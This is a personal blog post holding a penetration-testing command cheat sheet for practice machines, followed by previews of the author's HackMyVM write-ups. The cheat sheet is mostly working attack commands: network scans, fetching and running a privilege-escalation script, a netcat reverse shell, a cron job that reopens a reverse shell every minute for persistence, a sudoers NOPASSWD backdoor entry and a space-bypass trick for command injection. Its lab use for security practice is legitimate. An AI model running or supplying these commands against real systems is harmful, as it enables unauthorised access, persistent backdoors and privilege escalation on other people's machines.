My Useful commands

Just my Cheatsheet for commands


Find host

nmap -sP 10.0.0.10/25

sudo netdiscover -r 10.0.0.0/24

Scan

nmap -v -T4 -p- -sC -sV -oN nmap.out 10.0.0.20

sudo nmap -sC -sV -O -p- -oN nmap.out 10.0.0.20

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r -u http://10.0.0.24/ -x html,php,txt,jpg -o dir-medium.txt --no-error


Exploting

wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh

sh ./linpeas.sh|tee linp.log  


getcap -r / 2>/dev/null 


find / -perm -4000 -exec ls -al {} \; 2>/dev/null   


find . -name <user> 2>/dev/null

find . -group <user> 2>/dev/null




#Catch on Kali
nc -lvp 4444
#Target
nc -e /bin/sh 10.0.3.4 4444

#Stabilise Shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
<ctrl + z>
stty raw -echo;fg
reset

Crontab to maintain access if needed.

echo "#!/bin/bash">/dev/shm/test.sh
echo "nc -e /bin/bash 10.0.0.10 9999">>/dev/shm/test.sh
chmod 777 /dev/shm/test.sh
echo "* * * * * /dev/shm/test.sh"|crontab -

sudo

  echo "user ALL=(ALL) NOPASSWD:ALL" > /etc/sudoers.d/user


Break line into words: tr ' ' '\n' < file
Remove blank lines: sed -i '/^$/d' file.txt
remove trailing whitespace: sed -i 's/[ \t]*$//' "$1"
Space when you cant use a space: ${IFS} or $IFS

Zone transfer DNS
dig axfr hostname.hmv @10.0.0.100



Bypass IPTables with IPv6


Comments

Post a Comment

Popular posts from this blog

Zeug - HackMyVM

Image
  This was a really nice machine, if you like to be annoyed by trying to do the same thing many different ways until you eventually get somewhere... Thank you c4rta - looking forward to your next machine ;) Find it sudo netdiscover -r 10.0.0.0/24 -i eth1 -P  _____________________________________________________________________________    IP            At MAC Address     Count     Len  MAC Vendor / Hostname        -----------------------------------------------------------------------------  10.0.0.1        08:00:27:41:d0:fa      1      60  PCS Systemtechnik GmbH  10.0.0.123      08:00:27:fc:d6:0f      1      60  PCS Systemtechnik GmbH -- Active scan completed, 2 Hosts found. nmap -v -T4 -p- 10.0.0.123        Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-07 04:21 EST Initiating Ping Scan at 04:21 Scanning 10.0.0.123 [2 ports] Completed Ping Scan at 04:21, 0.01s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 04:21 Completed Parallel DNS resolution of 1 host
Read more

Espo - HackMyVM

Image
Another interesting machine from cromiphi... Writeup abridged to remove the several hour pause before making any progress!!! Discovery: ┌──( kali㉿kali )-[ ~/hmv/espo ] └─ $ sudo netdiscover -r 10.0.0.0/24 -i eth1 -P _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 10.0.0.1 08:00:27:c5:8d:93 1 60 PCS Systemtechnik GmbH 10.0.0.161 08:00:27:4f:55:18 1 60 PCS Systemtechnik GmbH -- Active scan completed, 2 Hosts found. ┌──( kali㉿kali )-[ ~/hmv/espo ] └─ $ sudo nmap -sC -sV -O -p- -oN nmap.out 10.0.0.161 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-08 05:21 EST Nmap scan report for 10.0.0.161 Host is up (0.0016s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
Read more

HackMyVM - Comingsoon

Image
  Find it └─ $ sudo netdiscover -r 10.0.0.0/24 -P | tee findit [sudo] password for kali:     _____________________________________________________________________________    IP             At MAC Address     Count     Len   MAC Vendor / Hostname         -----------------------------------------------------------------------------   10.0.0.1         08:00:27:96:87:13       1       60   PCS Systemtechnik GmbH   10.0.0.90       08:00:27:03:05:3c       1       60   PCS Systemtechnik GmbH -- Active scan completed, 2 Hosts found.      Scan it └─ $ nmap -T4 -p- -sC -sV -oN nmap.out 10.0.0.90   Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-22 12:49 EST Nmap scan report for 10.0.0.90 Host is up (0.00097s latency). Not shown: 65533 closed ports PORT   STATE SERVICE VERSION 22/tcp open   ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0) | ssh-hostkey:   |   3072 bc:fb:ec:b8:93:d4:e2:78:76:eb:1b:dc:4b:a7:7f:9b (RSA) |   256 31:41:a0:d7:e9:3c:79:11:c2:f0:81:a0:fe:2d:f9:b0 (ECDSA) |_  
Read more